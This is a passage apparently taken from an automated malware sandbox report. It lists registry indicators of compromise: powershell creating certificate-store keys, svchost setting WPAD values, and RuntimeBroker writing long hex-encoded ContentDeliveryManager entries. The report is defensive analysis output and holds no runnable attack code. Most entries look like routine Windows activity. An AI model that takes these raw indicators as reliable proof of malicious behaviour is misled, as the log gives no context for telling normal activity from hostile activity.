created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-70-15-aa-41-2e\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-70-15-aa-41-2e\WpadDecisionReason = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E0CF6114-44A5-419E-A803-E372085BAF38}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-70-15-aa-41-2e\WpadDecisionTime = 36b0d8ce20c9db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-70-15-aa-41-2e svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 = e5cbe4b820c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\385674e662bcf8337f0b4e0d75e03e488804977d82e6fbf89086aa3d782956f5" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5880ef33-96c8-45b3-9 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5880ef33-96c8-45b3-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\96e66b67-1f74-407c-a = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9142683d-0df5-4154-8 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74bc0ac8-5656-46a9-b = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2cdb32b78fc3107898458d957e1b34c567cf4f636646154a71f8f22caa4c8080" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88462841-7528-431e-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\386c21c9-9fb0-4da8-8 = 522e3eba20c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\386c21c9-9fb0-4da8-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\386c21c9-9fb0-4da8-8 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006ee865b920c9db011c0727ba20c9db011c0727ba20c9db0123ac15000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000333835363734653636326263663833333766306234653064373565303365343838383034393737643832653666626638393038366161336437383239353666350000b20009000400efbeb45ae605b45ae6052e00000000000000000000000000000000000000000000000000ea783c00330038003500360037003400650036003600320062006300660038003300330037006600300062003400650030006400370035006500300033006500340038003800380030003400390037003700640038003200650036006600620066003800390030003800360061006100330064003700380032003900350036006600350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33383536373465363632626366383333376630623465306437356530336534383838303439373764383265366662663839303836616133643738323935366635000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f4d873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f4d873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9142683d-0df5-4154-8 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = 2ec6f9b920c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88462841-7528-431e-b = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\700a445815bf4636b5df742c548f8b4a4b8339ddb3f54de002274e7eca8174ce" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0c8a10a5-b64f-4bac-b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\96e66b67-1f74-407c-a = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9142683d-0df5-4154-8 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9142683d-0df5-4154-8 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\700a445815bf4636b5df742c548f8b4a4b8339ddb3f54de002274e7eca8174ce" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cec434f6e77ddc3836d74b43a6c46edcd08258c74763a1f8c0bda8e3dac769ad" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0dc94e06-de9b-4ca9-9 = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cec434f6e77ddc3836d74b43a6c46edcd08258c74763a1f8c0bda8e3dac769ad" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c8793ee-0bc6-4888-b = e5a8d7b820c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\274f5223-fcab-4c69-8 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0dc94e06-de9b-4ca9-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5880ef33-96c8-45b3-9 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\96e66b67-1f74-407c-a = "\\\\?\\Volume{A28AA19B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2cdb32b78fc3107898458d957e1b34c567cf4f636646154a71f8f22caa4c8080" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\96e66b67-1f74-407c-a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000008fd59b920c9db0141bbdab920c9db0141bbdab920c9db0190f107000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000326364623332623738666333313037383938343538643935376531623334633536376366346636333636343631353461373166386632326361613463383038300000b20009000400efbeb45ae605b45ae6052e00000000000000000000000000000000000000000000000000b88b4f00320063006400620033003200620037003800660063003300310030003700380039003800340035003800640039003500370065003100620033003400630035003600370063006600340066003600330036003600340036003100350034006100370031006600380066003200320063006100610034006300380030003800300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32636462333262373866633331303738393834353864393537653162333463353637636634663633363634363135346137316638663232636161346338303830000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000079617369657574650000000000000000e4aa6f5acf077347a9d2f9f3b849919f4b873f7b6a27f011abf8e2869430c066e4aa6f5acf077347a9d2f9f3b849919f4b873f7b6a27f011abf8e2869430c066ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003900330030003500390037003500310033002d003700370039003000320039003200350033002d003700310038003800310037003200370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000009ba18aa2000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88462841-7528-431e-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c8793ee-0bc6-4888-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74bc0ac8-5656-46a9-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40936423-619e-4a4a-9 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\20a74ba0-d257-4c94-8 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000016efe9b820c9db0116efe9b820c9db0116efe9b820c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45ae6052000333835363734653636326263663833333766306234653064373565303365343838383034393737643832653666626638393038366161336437383239353666350000b20009000400efbeb45ae605b45ae6052e00000000000000000000000000000000000000000000000000ea783c00330038003500360037003400650036003600320062006300660038003300330037006600300062003400650030006400370035006500300033006500340038003800380030003400390037003700640038003200650036006600620066003800390030003800360061006100330064003700380032003900350036006600350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000b9a3793d1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c